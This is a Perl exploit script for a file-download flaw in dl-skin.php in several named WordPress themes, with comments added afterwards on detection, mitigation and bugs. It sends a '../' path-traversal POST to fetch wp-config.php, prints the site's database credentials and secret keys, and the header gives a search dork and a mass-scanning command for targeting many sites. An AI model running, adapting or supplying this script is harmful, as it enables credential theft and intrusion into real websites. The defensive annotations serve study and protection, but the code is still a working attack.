#!/usr/bin/perl
############################################
############################################
## WORDPRESS AFD dl-skin.php Exploit
## CODED BY ALI MEHDIOUI
## ALISAM TECHNOLOGY TEAM
############################################
## VULNERABLE THEMES:
## wp-content/themes/awake/
## wp-content/themes/elegance/
## wp-content/themes/barracudafx/
## wp-content/themes/fusion/
## wp-content/themes/dejavu/
## wp-content/themes/infocus/
## wp-content/themes/Minamaze_Pro/
## wp-content/themes/Melos_Pro/
## wp-content/themes/versatile/
## wp-content/themes/construct/
## wp-content/themes/persuasion/
## wp-content/themes/mesocolumn/
## [+][+]
## USAGE:
## perl WP-dl-skin-exploit.pl http://site.com/wp-content/themes/THEME NAME/lib/scripts/dl-skin.php
## [+][+]
## ATSCAN MASS USAGE:
## atscan -d 'index of /lib/scripts/dl-skin.php' -m 2 -l 10 --command "perl WP-dl-skin-exploit.pl --TARGET"
## DORKS
## DORK: index of /lib/scripts/dl-skin.php
############################################
############################################
use strict;
use warnings;
use FindBin '$Bin';
use Term::ANSIColor;
use URI::Escape;
use HTML::Entities;
use LWP::UserAgent;
# Single-target check for the dl-skin.php file-disclosure issue named in the
# header: one POST is sent and the reply is tested for wp-config.php content.
#
# Defender notes:
#   - Detection: look for POST requests to .../lib/scripts/dl-skin.php whose
#     body has a _mysite_download_skin value containing "../" segments. Access
#     logs usually omit request bodies, so a WAF or body-logging rule is needed
#     to see the parameter itself.
#   - Mitigation: remove or update the affected theme, or deny direct web access
#     to the script. If a request like this ever succeeded, treat the database
#     credentials and keys/salts in wp-config.php as exposed and rotate them.
print color 'reset';
# Banner printed on every run.
# NOTE(review): the title names timthumb-config.php, but everything else in
# this script targets dl-skin.php.
print "
[+]================================================================[+]
[+]--------- Wordpress AFD timthumb-config.php Exploit -----------[+]
[+]-------------- Alisam Technology --------------[+]
[+]------ https://www.fb.com/Forces.des.tempetes.marocaines ------[+]
[+]------ https://www.youtube.com/user/aliartes ------[+]
[+]================================================================[+]
";
# The first command-line argument (target URL) is required; without it the
# script prints a usage line and stops.
# NOTE(review): the usage text refers to a PHP file name although this is a
# Perl script (compare the USAGE line in the header).
if (!$ARGV[0]) { print "Usage: php WP-dl-skin.php-exploit.php http://www.site.com/wp-content/themes/THEME NAME/....\n"; exit; }
# HTTP client with a 10-second timeout.
# NOTE(review): $ua is reassigned to a fresh LWP::UserAgent further down, so
# the timeout configured here is not carried over to the object that actually
# sends the request.
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
my $URL=$ARGV[0];
# Result labels: index 0 is printed when the response matches, index 1 otherwise.
my @error=("Target Vulnerable", "Target Not vulnerable");
# Normalise the target: drop everything from the first "scripts/" onward (/s
# lets .* cross newlines), then append the fixed script path. If the argument
# contains no "scripts/" segment the substitution is a no-op and the path is
# appended to the argument as given.
$URL=~s/scripts\/(.*)//s;
$URL=$URL."scripts/dl-skin.php";
print " SCAN : ";
# `use` is resolved at compile time, so POST is imported even though this line
# sits in the middle of the script.
use HTTP::Request::Common;
$ua = LWP::UserAgent->new;
# The form's _mysite_download_skin field carries a relative path with five
# "../" segments ending in wp-config.php. A server-side handler that uses this
# value as a file path without validation would return that file.
my $response=$ua->request(POST $URL, ['Content_Type' => 'form-data', '_mysite_download_skin' => '../../../../../wp-config.php']);
# Heuristic: any response body containing the string "DB_NAME" counts as a hit,
# so an unrelated page that happens to include that text is also reported as
# vulnerable.
if ($response->content=~/DB_NAME/) {
print color 'green'; print "$error[0]\n";
# The full response body is written to the terminal. On a real hit that is the
# site's wp-config.php, i.e. database credentials and secret keys in clear
# text, which then also land in any scrollback or captured output.
print color 'green'; print $response->content."\n";
print color 'reset';
}else{
# No match (including connection errors, whose body will not contain DB_NAME).
print color 'red'; print "$error[1]\n";
print color 'reset';
}